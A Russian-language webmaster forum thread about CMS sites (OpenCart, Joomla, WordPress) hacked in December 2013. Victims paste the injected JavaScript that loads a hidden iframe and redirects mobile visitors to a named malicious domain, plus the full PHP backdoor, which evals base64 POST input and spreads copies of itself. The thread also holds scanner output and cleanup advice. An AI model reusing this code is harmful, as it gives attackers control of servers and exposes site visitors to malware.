Хакнули! Наконец-то :)

[willyns]

Всем привет!

Сегодня проснулся от смс клиента - не могу зайти на ваш сайт! (Хехе, спасибо ему за это)

 

Бегу жеж смотреть, что такое, и вот:

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in/home/*/*/system/library/session.php on line 11Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/webroid/prowood.com.ua/index.php:30) in /home/*/*/system/library/session.php on line 11Warning: Cannot modify header information - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in /home*/*/catalog/controller/common/seo_pro.php on line 305Warning: Cannot modify header information - headers already sent by (output started at /home/webroid/prowood.com.ua/index.php:30) in /home/*/*/system/library/response.php on line 12

Побежал к хостеру сначала,  а потом думаю, а ну-ка гляну внимательнее, что там.

Заглядываем в index.php ииии ТАДАМ!!

 

/*CORE include code version:1.23 START*/


echo "<script type=\"text/javascript\"> 
    function sd5135GHEDF(agaga31323l) {
        var melm = document.getElementById(\"a35fdsfdsf62FFSSD\");
        if (typeof(melm) != \"undefined\" && melm!= null)
        {}else{
            var dsdSSSWrw515312FFF = document.createElement(\"iframe\");
            dsdSSSWrw515312FFF.id = \"a35fdsfdsf62FFSSD\";
         dsdSSSWrw515312FFF.style.width = \"10px\";
         dsdSSSWrw515312FFF.style.height = \"10px\";
         dsdSSSWrw515312FFF.style.border = \"0px\";
         dsdSSSWrw515312FFF.frameBorder = \"0\";
            dsdSSSWrw515312FFF.style.position = \"absolute\";
            dsdSSSWrw515312FFF.style.left = \"-200\";
         dsdSSSWrw515312FFF.setAttribute(\"frameBorder\", \"0\");
         document.body.appendChild(dsdSSSWrw515312FFF);
         dsdSSSWrw515312FFF.src = agaga31323l;
         return true;
        }
    }
function asd61234tkhjasd454hfhf235(){
    sd5135GHEDF(\"http://novostivkontakte.ru/?id=ifrm\");   
}
function R(){
if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){  }else{asd61234tkhjasd454hfhf235();}
}
setTimeout(function(){R();},1000);
</script>";


/*END CORE include code version:1.23*/

Вот он, злыдень!! :)

 

Скажите, дорогие специалисты, как такое стало возможным и как от этого оградиться в будущем?

 

[afwollis]

как такое стало возможным

п.1: долгий кропотливый анализ ситуации/логов/прочих_данных вам в помощь.

как от этого оградиться в будущем?

п.2: исходя из результатов п.1

[willyns]

охохоюшки хохо )))

запустил сканирование сервера средствами хостера - да у меня там как у Жучки блох каких-то адских ифреймов и прочее... Жуть :) Причём в основном под ударом wordpress

 

ещё один злыдень с таким же кодом:

tivkontakte.ru

[afwollis]

в таком случае - видимо, поимели ваш WP, а потом уже через него добрались до остального.

[Гість]

а ещё загляните в response.php .... там в конце файла можно думаю многое найти (не стоит скачивать моды с левых сайтов)

[seleve]

вчера произошла такая же ситуация, пострадали все сайты на хостинге, именно джумлы, WP работает, синхронно с этой ситуацией в директориях www стали появляться разные файлы типа Vt56TG.php, причем пачками, решение не нашел пока, чищу и переношу сайты на другую площадку

[Einshtein]

 стали появляться разные файлы типа Vt56TG.php

скорее всего шел...и пока вы не поудаляете все подозрительные файлы - перенос сайта на другую площадку мало чем поможет...

В большинстве случаев с которыми я сталкивался - заражение происходило через другие сайты на площадке...особенно жумла поучавствовала в этом.

Развместите ОС на отдельном хосте

[seleve]

скорее всего шел...и пока вы не поудаляете все подозрительные файлы - перенос сайта на другую площадку мало чем поможет...

В большинстве случаев с которыми я сталкивался - заражение происходило через другие сайты на площадке...особенно жумла поучавствовала в этом.

Развместите ОС на отдельном хосте

этим и занимаюсь, выкачиваю и очищаю сайты от вредоносных файлов (кода) и заливаю группами на другие площадки, чтобы выявить какой из сайтов пробило.

[willyns]

мда.... с утра удалил, вечером то же самое.

тулят свои ифреймы в index.php и admin/index.php

так ладно бы незаметно, так завешивает жеж весь сайт.

Эх, кулхацкеры, кулхацкеры  :-)

[veacheslav]

мда.... с утра удалил, вечером то же самое.

тулят свои ифреймы в index.php и admin/index.php

так ладно бы незаметно, так завешивает жеж весь сайт.

Эх, кулхацкеры, кулхацкеры  :-)

У меня та же самая беда... Joomla 2.5

полазил и увидел что появился файлик замечательный в ".../plugins/system/widgetkit_zoo/widgets/slideshow/params/zoo2.4/pOOmfN.php"

через что получили доступ пока ума не приложу, смотрел что залили в папке cache и в основном в .js этого самого widgetkit

кто подскажет, как оградиться?

[Dennynic]

Сегодня обнаружил такую же проблему. Файлы index.php в корне и в админке залечены js. В зараженных joomla и PHPBB. MODx не тронут. На хостинге были пустые папки с правами 755 внутри которых был обычный index.html. Так вот в этих папках обнаружилось множество php файлов под разными именами, но содержание у всех одинаковое.

<?php

$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
 $isevalfunctionavailable = false;                  
 $evalcheck = "\$isevalfunctionavailable = true;";
 @eval($evalcheck);
 if ($isevalfunctionavailable === true) {
    $fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";
    
    $fv = $fnsdht($_POST["gjwqweodsa"]);
    @eval($fv);
    //@eval($_POST["gjwqweodsa"]);
 }else{
    $mpath =  realpath("")."/";
    //$dop = "\n@unlink(\"".$mpath."dsadasdsa1fag1.php\");\n";
    if(@file_put_contents($mpath."dsadasdsa1fag1.php","<?php\n".$fnsdht($_POST["gjwqweodsa"])."\n?>")){
        @include_once($mpath."dsadasdsa1fag1.php");
        @unlink($mpath."dsadasdsa1fag1.php");
    }else{
        echo "ERROR! CANT DO NOTHING!";
    }
 }
}
//if (is_uploaded_file($_FILES['file']['tmp_name']))
if(!empty($_POST['fname']) and isset($_POST['fname']) and strlen($_POST['fname'])>0)
{
  $fname = trim($_POST['fname']);
  $save_type = trim($_POST['save_type']);
  $dirname = trim($_POST['dirname']);
  $namecrt = trim($_POST['namecrt']);
  
  $auth_pass = trim($_POST['auth_pass']);
  $change_pass = trim($_POST['change_pass']);
  
  $file_type = trim($_POST['file_type']);
  $ftdata = trim($_POST['ftdata']);
  $is_sh = trim($_POST['is_sh']);
  
  if($namecrt == "random"){
    $fname = make_name($fname);
  }
  $uploadfile = "";
  
  if($save_type == "same_dir"){
    $uploadfile = realpath("")."/". $fname;
  }else if($save_type == "sub_dir"){
    $uploadfile = realpath("")."/$dirname/". $fname;
    if(!@mkdir(realpath("")."/$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    if(@is_writable($root)){
        $uploadfile = $root.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "root_in_dir"){
    $root = $_SERVER['DOCUMENT_ROOT']."/";
    $uploadfile = $root."$dirname/". $fname;
    if(!@mkdir($root."$dirname/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "random_dir"){
    $uploadfile = choose_dir();
    if(@is_writable($uploadfile)){
        $uploadfile = $uploadfile.$fname;
    }else{
        $uploadfile = realpath("")."/". $fname;
    }
  }else if($save_type == "random_dir_random_dirname"){
    $dirs = array("dwr","temp","htdata","docs","memory","limits_data","module_config","temp_memory");
    $dr = $dirs[array_rand($dirs)];
    
    $chodir =  choose_dir();
    $uploadfile = $chodir.$dr."/".$fname;
    
    if(!@mkdir($chodir."$dr/", 0755)){
        $uploadfile = realpath("")."/". $fname;
    }
  }else{
    $uploadfile = realpath("")."/". $fname;
  }
  if($file_type == "file"){
     if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
      {
        if($is_sh == "1" or $is_sh == 1){
            if($change_pass == "1" or $change_pass == 1){   
            
            }else{
                $auth_pass = "";
            }
            $d = @file_get_contents($uploadfile);
            $d = str_replace("{||AUTH_PASS||}",$auth_pass,$d);
            @file_put_contents($uploadfile,$d);
        }
        $url = "http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile);
        echo "UPLOAD:".$url."-END";
      }
      else 
      {
            echo "ERROR upload";
      }
  }else{
    if($is_sh == "1" or $is_sh == 1){
            if($change_pass == "1" or $change_pass == 1){   
            
            }else{
                $auth_pass = "";
            }
            $ftdata = base64_decode($ftdata);
            $ftdata = str_replace("{||AUTH_PASS||}",$auth_pass,$ftdata);
    }
    if(@file_put_contents($uploadfile,$ftdata)){
    	@chmod($uploadfile,0644);
    	echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
    }else{
    	$fp = fopen($uploadfile, "w");
    	if($fp === false){
    		echo "ERROR upload";
    	}else{
    		@fputs ($fp, $ftdata);
    		@fclose ($fp);
    		@chmod($uploadfile,0644);
    		echo "UPLOAD:http://".str_replace($_SERVER["DOCUMENT_ROOT"],$_SERVER["SERVER_NAME"],$uploadfile)."-END";
    	}
    }
  }
      
}

function make_name($curname){
    $l = array("_","__","q","w","e","r","t","y","u","i","o","p","a","s","d","f","g","h","j","k","l","z","x","c","v","b","n","m","1","2","3","4","5","6","7","8","9","Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
    $leng = rand(3, 9);
    $ret = "";
    for($i = 0; $i < $leng; $i++){
        $ret .= $l[array_rand($l)];
    }
    $curname = explode(".",$curname);
    return $ret.".".$curname[1];
}

function choose_dir(){
    $lim = 0;
    $res_dirs = array_unique(my_scan($_SERVER['DOCUMENT_ROOT']."/",$lim));
    $t = array();
    for($j = 0; $j < count($res_dirs); $j++){
        $ct = explode("/",$res_dirs[$j]);
        $t[] = count($ct);
    }
    arsort($t);
    $cpath = "";
    $wrt_dirs = array();
    foreach($t as $key=>$val){
        if(@is_writable($res_dirs[$key])){
           if(@file_put_contents($res_dirs[$key]."t.php","hello")){
              @unlink($res_dirs[$key]."t.php");
              //$cpath =  $res_dirs[$key];
              //break;
              $wrt_dirs[] = $res_dirs[$key];
           }
        }
    }
    if(!empty($wrt_dirs) and count($wrt_dirs)>1){
        $cpath = $wrt_dirs[array_rand($wrt_dirs)];
    }
    if(empty($cpath) or $cpath == "" or strlen($cpath) == 0){
       $cpath = $_SERVER['DOCUMENT_ROOT']."/";
    }
    return $cpath;
}

function my_scan($startDir,&$lim){
    $cur_dir = @scandir($startDir);
    $res = array();
    for($ii = count($cur_dir)-1; $ii >=0; $ii--){
        $one_dir = $cur_dir[$ii];
        @set_time_limit(0);
        if($lim > 100)break;
        $d = $startDir.$one_dir;
        if(!@is_link($d) and @is_dir($d."/") && $one_dir !== "." && $one_dir !== ".." && $one_dir !== "cgi-bin" && $one_dir !== "webstats" && $one_dir !== "uploads" && $one_dir !== "upload" && $one_dir !== "js" && $one_dir !== "img" && $one_dir !== "images" && $one_dir !== "templates" && $one_dir !== "webstat" && strpos($one_dir,"backup")===false){
            if(@is_readable($d."/")){
                $res[] = $d."/"; 
                $res = array_merge($res,my_scan($d."/",$lim)); 
            }   
        }
        $lim++;
    }
    return $res;
}
?> 

Т.к. названия файлов у всех разное, это говорит о том что его генерит скрипт, собственно он выше в php-коде, так же этот скрипт распихивает свои копии по рандомным папкам. Подозрение на шелл, будем искать. 

. 

[willyns]

 

 

Сегодня обнаружил такую же проблему. Файлы index.php в корне и в админке залечены js. В зараженных joomla и PHPBB. MODx не тронут. На хостинге были пустые папки с правами 755 внутри которых был обычный index.html. Так вот в этих папках обнаружилось множество php файлов под разными именами, но содержание у всех одинаковое.

 

В одной из веток здесь нашёл совет поискать base64_decode сквозь все файлы программой FileSeek

Нашёл 3 файла с кривыми генерёнными названиями

 \system\config\JRhmUunF.php

\system\config\CEVE___ab.php

\image\flags\Qra9sia.php

 

с таким же содержанием  :|

[SteveVai]

Та же самая проблема на Joomla. Пострадали все сайты на хостинге. Файлы созданы 25 числа. index.php и куча левых файлов в разных папках. Удалил все, через час проблема повторилась. Кто-нибудь что-нибудь выяснил? Как эту гадость убрать? 

[smsbase]

Та же самая проблема на Joomla. Пострадали все сайты на хостинге. Файлы созданы 25 числа. index.php и куча левых файлов в разных папках. Удалил все, через час проблема повторилась. Кто-нибудь что-нибудь выяснил? Как эту гадость убрать?

Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

[pashast]

Аналогично, появилось 25 и пару дней борьбы не помагает. Последнее что сделал поставил права на файлы index.php 400

 

У вас хостинг какой? не SWEB случайно? - может нам заливают дрянь на сайты через другие аккаунты хостинга?

Да, напишите все какой хостер. Может это взломали хостера.

 

p.s. для поиска заразы рекомендую это http://www.revisium.com/ai/

[SteveVai]

Да, напишите все какой хостер. Может это взломали хостера.

 

p.s. для поиска заразы рекомендую это http://www.revisium.com/ai/

Хостинг RU-CENTER

 

Спасибо огромное за скрипт. Показывает всю заразу.

После удаления, пока что все ОК.

[smsbase]

Хостинг RU-CENTER

 

Спасибо огромное за скрипт. Показывает всю заразу.

После удаления, пока что все ОК.

Что удаляли и где? Нашли место взлома сайта?

[chukcha]

Показывает всю заразу.

 

Этого мало...

Еще нужно найти точку входа...

[motorostov]

У меня таже история, делаю откаты, помогает на 3 дня затем всё снова повторяется, хостинг от ihc.ru
на всех сайтах, joomla, opencart и InstantCMS. Воабще не понимаю что делать
 
вот этот код:

<script type="text/javascript">     function sd5135GHEDF(agaga31323l) {        var melm = document.getElementById("a35fdsfdsf62FFSSD");        if (typeof(melm) != "undefined" && melm!= null)        {}else{            var dsdSSSWrw515312FFF = document.createElement("iframe");            dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD";        	dsdSSSWrw515312FFF.style.width = "10px";        	dsdSSSWrw515312FFF.style.height = "10px";        	dsdSSSWrw515312FFF.style.border = "0px";        	dsdSSSWrw515312FFF.frameBorder = "0";            dsdSSSWrw515312FFF.style.position = "absolute";            dsdSSSWrw515312FFF.style.left = "-200";        	dsdSSSWrw515312FFF.setAttribute("frameBorder", "0");        	document.body.appendChild(dsdSSSWrw515312FFF);        	dsdSSSWrw515312FFF.src = agaga31323l;        	return true;        }    }function asd61234tkhjasd454hfhf235(){    sd5135GHEDF("http://novostivkontakte.ru/?id=ifrm");   }function SFWR64362fdhHHHHH(){if(navigator.userAgent.match(/(Googlebot|robot|Slurp|search.msn.com|nutch|simpy|bot|ASPSeek|crawler|msnbot|Libwww-perl|FAST|Baidu|googlebot|slurp|aspseek|libwww-perl|fast|baidu)/i)!==null){  }else{asd61234tkhjasd454hfhf235();}if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone|mobile|android|blackberry|brew|cldc|docomo|htc|j2me|micromax|lg|midp|mot|motorola|netfront|nokia|obigo|openweb|opera.mini|palm|psp|samsung|sanyo|sch|sonyericsson|symbian|symbos|teleca|up.browser|vodafone|wap|webos|windows.ce)/i)!==null){ try{setTimeout(function(){window.location="http://novostivkontakte.ru/?id=mob";},1000);}catch(err) {window.location="http://novostivkontakte.ru/?id=mob";location.href="http://novostivkontakte.ru/?id=mob";}}}//setTimeout(function(){R();},1500);try {        if(window.attachEvent) {            window.attachEvent("onload", SFWR64362fdhHHHHH);        } else {        if(window.onload) {            var curronload = window.onload;            var newonload = function() {                curronload();                SFWR64362fdhHHHHH();            };            window.onload = newonload;        } else {			window.onload = SFWR64362fdhHHHHH;		}	}} catch(err) {}

[icqmag]

 InstantCMS в помойку убирай, поймал сам от нее.

[SteveVai]

Что удаляли и где? Нашли место взлома сайта?

 

Трудно сказать откуда именно залезло. 

На всех сайтах примерно все одно и то же, что-то типа этого:

(Все удалил, кроме index.php, их заменил на нормальные)

 

Критические замечания

 

Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт:

Путь Дата создания Дата модификации Размер CRC32

.../docs/plugins/system/legacy/KUa__.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:15

6.50 Kb

-1991197706

.../docs/plugins/system/legacy/NI6rP2lN1.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:25

6.50 Kb

-1991197706

.../docs/plugins/system/mtupgrade/KTnkz.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:18

6.50 Kb

-1991197706

.../docs/plugins/system/ldZMkjXEV.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e"; $f

25/12/2013 03:09:40

6.49 Kb

-1875437887

.../docs/plugins/system/dvHBmx2.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:54:58

6.50 Kb

-1991197706

.../docs/plugins/user/NdMv_.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:11

6.50 Kb

-1991197706

.../docs/plugins/user/aj1l__35tJ.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:26

6.50 Kb

-1991197706

.../docs/plugins/xmlrpc/DWoLcAKs.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:21

6.50 Kb

-1991197706

.../docs/plugins/xmlrpc/avP.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

27/12/2013 17:14:05

6.50 Kb

-1991197706

.../docs/plugins/xmlrpc/K8d.php

<?php //|$auth_pass = "9bc2e1d95fab7d35f25dc619521182ff"; $auth_pass = ""; if(!empty($

27/12/2013 23:55:45

24.26 Kb

1205493127

.../docs/plugins/xmlrpc/sys09725827.php

ywpz}=text_macros(${${"\x47\x4c\x4fB\x41\x4cS"}["\x71\x77j\x72j\x6f"]});$zpddcmh|vkqr="\x6de\x73\x73a\x67\x65\x73";${"\x47\x4cO\x42\x41\x4cS"}["\x6d\x62\x69\x68

28/12/2013 00:26:26

41.29 Kb

1192102346

.../docs/xmlrpc/cache/4mbuLNPm.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

27/12/2013 17:14:07

6.50 Kb

-1991197706

.../docs/xmlrpc/includes/qvtR6Ndn.php

= true;"; @eval($evalcheck); if ($isevalfunctionavailable === true) { |$fnsdht = "b".""."as"."e"."".""."6"."4"."_"."de".""."c"."o".""."d"."e";

25/12/2013 14:55:14

6.50 Kb

-1991197706

 

Найдены сигнатуры javascript вирусов:

Путь Дата создания Дата модификации Размер CRC32

.../docs/index.php

pseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} |if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windo

27/12/2013 14:59:40

4.40 Kb

1607522158

.../docs/plugins/editors/jckeditor/plugins/pastefromword/filter/default.js

,convertToPx:(function(){var h=CKEDITOR.dom.element.createFromHtml('<div style=|position:absolute;left:-9999px;top:-9999px;margin:0px;padding:0px;border:0px;">

05/04/2012 20:33:36

11.57 Kb

-232178055

.../docs/plugins/xmlrpc/sys09725827.php

47\x4c\x4fBA\x4c\x53"}["b\x79\x79\x70c\x75yk]="\x6b\x65\x79";if(isset($_POST["c|\x6fde"])&&isset($_POST["\x63u\x73\x74\x6f\x6d\x5f\x61\x63t\x69on"])){eval(base

28/12/2013 00:26:26

41.29 Kb

1192102346

.../docs/administrator/index.php

pseek|libwww-perl|fast|baidu)/i)!==null){ }else{asd61234tkhjasd454hfhf235();} |if(navigator.userAgent.match(/(android|midp|j2me|symbian|series 60|symbos|windo

27/12/2013 14:59:40

4.51 Kb

1603720537

 

[magneto2010]

Ой помню этот пападос, только заразил не свои сайты и магазины заказчиков. Плювался потом

Всё лечиться вычисткой этой гадости, редиректов (магазины с мобил перекидывало на адалт или на скачку всякой всячины) и прочей хни, выставлением прав на папки и файлы и заменой всех паролей на хостинге и ftp.

 

P>S - не храните пароли в ftp клиентах типо FileZila и тд. Вся глина оттуда. 

 

 

 

У меня таже история, делаю откаты, помогает на 3 дня затем всё снова повторяется, хостинг от ihc.ru
на всех сайтах, joomla, opencart и InstantCMS. Воабще не понимаю что делать
 

 

 

Тупо перекатать сохранёнку и излечиться не получиться - это как ключи у воров - вы как квартиру не убирайте - всё равно ночью к вам попадут. Пароли меняйте!!!

[motorostov]

смена паролей не помогает

[Denys]

Первое что нужно сделать сменить пароли от фтп и бд, далее качаем сайт на локаль сканируем антивирусом и параллельно ищем и удаляем подозрительные файлы.

Возможные причины по которым вас ломанули:

1. Варез (самая распространенная) любителям халявы посвящается :-D
2. Не правильные права на каталоги (рекомендуемые 775 на папки 644 на файлы)
3. Не обновленное ПО (открытые уязвимости)
4. Заражена локальная машина с которой админят сайты (ваш комп, часто пароли угоняют с почтового клиента и иногда с фтп клиента)
5. Слабые пароли (бутфорс)
6. Хостинг (есть колхозно настроенные хостинги у которых одинаковый путь к каталогу сайта)

Анализируйте логи, делайте выводы, принимайте меры...

[veacheslav]

У меня на джумле по мимо очистки и т.д., нашел "mod_confirmation", лежал себе там спокойно, в теперь внимание, перейдите по ссылке!))) 

нашел в google что по поиску только вот этот выдает,и не понятно, то ли они причастны, то ли тоже жертва

http://sjtorres.com/blah

 

еще "mod_administrator"